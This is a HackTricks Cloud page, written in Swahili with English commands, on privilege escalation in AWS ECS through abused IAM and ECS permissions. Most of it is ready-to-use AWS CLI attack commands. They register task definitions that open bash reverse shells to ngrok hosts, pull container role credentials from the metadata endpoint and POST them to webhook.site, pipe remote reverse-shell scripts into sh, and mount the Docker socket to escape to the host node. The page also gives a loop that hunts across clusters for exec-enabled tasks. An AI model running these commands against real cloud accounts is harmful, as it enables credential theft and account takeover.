AWS - ECS Privesc

Reading time: 9 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

ECS

Maelezo zaidi kuhusu ECS katika:

AWS - ECS Enum

`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:RunTask`

Mshambuliaji anayetumia ruhusa ya iam:PassRole, ecs:RegisterTaskDefinition na ecs:RunTask katika ECS anaweza kuunda tafsiri mpya ya kazi yenye konteina mbaya inayopora akidi za metadata na kuikimbia.

bash

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--requires-compatibilities "[\"FARGATE\"]" \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

# Run task definition
aws ecs run-task --task-definition iam_exfiltration \
--cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \
--launch-type FARGATE \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}"

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1

Unda webhook na tovuti kama webhook.site

bash


# Create file container-definition.json
[
{
"name": "exfil_creds",
"image": "python:latest",
"entryPoint": ["sh", "-c"],
"command": [
"CREDS=$(curl -s http://169.254.170.2${AWS_CONTAINER_CREDENTIALS_RELATIVE_URI}); curl -X POST -H 'Content-Type: application/json' -d \"$CREDS\" https://webhook.site/abcdef12-3456-7890-abcd-ef1234567890"
]
}
]

# Run task definition, uploading the .json file
aws ecs register-task-definition \
--family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 \
--memory 512 \
--requires-compatibilities FARGATE \
--container-definitions file://container-definition.json

# Check the webhook for a response

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1

Madhara Yanayoweza Kutokea: Privesc moja kwa moja kwa jukumu tofauti la ECS.

`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask`

Kama ilivyo katika mfano wa awali, mshambuliaji anayekandamiza ruhusa za iam:PassRole, ecs:RegisterTaskDefinition, ecs:StartTask katika ECS anaweza kuunda tafsiri mpya ya kazi yenye konteina mbaya inayopora akidi za metadata na kuikimbia.
Hata hivyo, katika kesi hii, inahitajika kuwa na mfano wa kontena ili kuendesha tafsiri mbaya ya kazi.

bash

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

aws ecs start-task --task-definition iam_exfiltration \
--container-instances <instance_id>

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1

Madhara Yanayoweza Kutokea: Privesc moja kwa moja kwa jukumu lolote la ECS.

`iam:PassRole`, `ecs:RegisterTaskDefinition`, (`ecs:UpdateService|ecs:CreateService)`

Kama ilivyo katika mfano wa awali, mshambuliaji anayekandamiza ruhusa za iam:PassRole, ecs:RegisterTaskDefinition, ecs:UpdateService au ecs:CreateService katika ECS anaweza kuunda tafsiri mpya ya kazi yenye konteina mbaya inayopora akidi za metadata na kuikimbia kwa kuunda huduma mpya yenye angalau kazi 1 inayoendelea.

bash

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn  "$ECS_ROLE_ARN" \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--requires-compatibilities "[\"FARGATE\"]" \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]"

# Run the task creating a service
aws ecs create-service --service-name exfiltration \
--task-definition iam_exfiltration \
--desired-count 1 \
--cluster "$CLUSTER_ARN" \
--launch-type FARGATE \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}"

# Run the task updating a service
aws ecs update-service --cluster <CLUSTER NAME> \
--service <SERVICE NAME> \
--task-definition <NEW TASK DEFINITION NAME>

Madhara Yanayoweza Kutokea: Privesc moja kwa moja kwa jukumu lolote la ECS.

`iam:PassRole`, (`ecs:UpdateService|ecs:CreateService)`

Kwa kweli, kwa ruhusa hizo tu inawezekana kutumia overrides kutekeleza amri zisizo na mipaka katika kontena lenye jukumu lolote kwa kutumia kitu kama:

bash

aws ecs run-task \
--task-definition "<task-name>" \
--overrides '{"taskRoleArn":"<role-arn>", "containerOverrides":[{"name":"<container-name-in-task>","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \
--cluster <cluster-name> \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"<subnet-name>\"]}}"

Madhara Yanayoweza Kutokea: Privesc moja kwa moja kwa jukumu lolote la ECS.

`ecs:RegisterTaskDefinition`, `(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)`

Hali hii ni kama zile za awali lakini bila ruhusa ya iam:PassRole.
Hii bado ni ya kuvutia kwa sababu ikiwa unaweza kuendesha kontena chochote, hata kama hakina jukumu, unaweza kuendesha kontena chenye mamlaka ili kutoroka hadi kwenye node na kuchukua jukumu la EC2 IAM na majukumu mengine ya kontena za ECS yanayoendesha kwenye node.
Unaweza hata kulazimisha kazi nyingine kuendesha ndani ya mfano wa EC2 ulioathiriwa ili kuchukua hati zao (kama ilivyojadiliwa katika Sehemu ya Privesc kwa node).

warning

Shambulio hili linawezekana tu ikiwa klasta ya ECS inatumia mifano ya EC2 na sio Fargate.

bash

printf '[
{
"name":"exfil_creds",
"image":"python:latest",
"entryPoint":["sh", "-c"],
"command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""],
"mountPoints": [
{
"readOnly": false,
"containerPath": "/var/run/docker.sock",
"sourceVolume": "docker-socket"
}
]
}
]' > /tmp/task.json

printf '[
{
"name": "docker-socket",
"host": {
"sourcePath": "/var/run/docker.sock"
}
}
]' > /tmp/volumes.json


aws ecs register-task-definition --family iam_exfiltration \
--cpu 256 --memory 512 \
--requires-compatibilities '["EC2"]' \
--container-definitions file:///tmp/task.json \
--volumes file:///tmp/volumes.json


aws ecs run-task --task-definition iam_exfiltration \
--cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \
--launch-type EC2

# You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell

`ecs:ExecuteCommand`, `ecs:DescribeTasks,``(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)`

Mshambuliaji mwenye ecs:ExecuteCommand, ecs:DescribeTasks anaweza kutekeleza amri ndani ya kontena linalofanya kazi na kuhamasisha jukumu la IAM lililounganishwa nalo (unahitaji ruhusa za kuelezea kwa sababu ni muhimu kutekeleza aws ecs execute-command).
Hata hivyo, ili kufanya hivyo, kifaa cha kontena kinahitaji kuwa kinatumia ExecuteCommand agent (ambayo kwa kawaida si hivyo).

Kwa hivyo, mshambuliaji anaweza kujaribu:

Jaribu kutekeleza amri katika kila kontena linalofanya kazi

bash

# List enableExecuteCommand on each task
for cluster in $(aws ecs list-clusters | jq .clusterArns | grep '"' | cut -d '"' -f2); do
echo "Cluster $cluster"
for task in $(aws ecs list-tasks --cluster "$cluster" | jq .taskArns | grep '"' | cut -d '"' -f2); do
echo "  Task $task"
# If true, it's your lucky day
aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | grep enableExecuteCommand
done
done

# Execute a shell in a container
aws ecs execute-command --interactive \
--command "sh" \
--cluster "$CLUSTER_ARN" \
--task "$TASK_ARN"

Ikiwa ana ecs:RunTask, endesha kazi kwa aws ecs run-task --enable-execute-command [...]
Ikiwa ana ecs:StartTask, endesha kazi kwa aws ecs start-task --enable-execute-command [...]
Ikiwa ana ecs:CreateService, unda huduma kwa aws ecs create-service --enable-execute-command [...]
Ikiwa ana ecs:UpdateService, sasisha huduma kwa aws ecs update-service --enable-execute-command [...]

Unaweza kupata mfano wa chaguzi hizo katika sehemu za awali za ECS privesc.

Athari Zinazoweza Kutokea: Privesc kwa jukumu tofauti lililounganishwa na kontena.

`ssm:StartSession`

Angalia katika ukurasa wa ssm privesc jinsi unavyoweza kutumia ruhusa hii ili privesc kwa ECS:

AWS - SSM Privesc

`iam:PassRole`, `ec2:RunInstances`

Angalia katika ukurasa wa ec2 privesc jinsi unavyoweza kutumia ruhusa hizi ili privesc kwa ECS:

AWS - EC2 Privesc

`?ecs:RegisterContainerInstance`

TODO: Je, inawezekana kujiandikisha kwa mfano kutoka akaunti tofauti ya AWS ili kazi zifanywe chini ya mashine zinazodhibitiwa na mshambuliaji??

`ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, `ecs:DescribeTaskSets`

note

TODO: Jaribu hii

Mshambuliaji mwenye ruhusa ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet, na ecs:DescribeTaskSets anaweza kuunda seti ya kazi mbaya kwa huduma iliyopo ya ECS na kusasisha seti ya kazi ya msingi. Hii inamruhusu mshambuliaji kutekeleza msimbo wowote ndani ya huduma.

bash

bashCopy code# Register a task definition with a reverse shell
echo '{
"family": "malicious-task",
"containerDefinitions": [
{
"name": "malicious-container",
"image": "alpine",
"command": [
"sh",
"-c",
"apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh"
]
}
]
}' > malicious-task-definition.json

aws ecs register-task-definition --cli-input-json file://malicious-task-definition.json

# Create a malicious task set for the existing service
aws ecs create-task-set --cluster existing-cluster --service existing-service --task-definition malicious-task --network-configuration "awsvpcConfiguration={subnets=[subnet-0e2b3f6c],securityGroups=[sg-0f9a6a76],assignPublicIp=ENABLED}"

# Update the primary task set for the service
aws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id

Madhara Yanayoweza Kutokea: Teua msimbo wa kiholela katika huduma iliyoathirika, ambayo inaweza kuathiri utendaji wake au kutoa data nyeti.

Marejeleo

https://ruse.tech/blogs/ecs-attack-methods

tip

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

HackTricks Cloud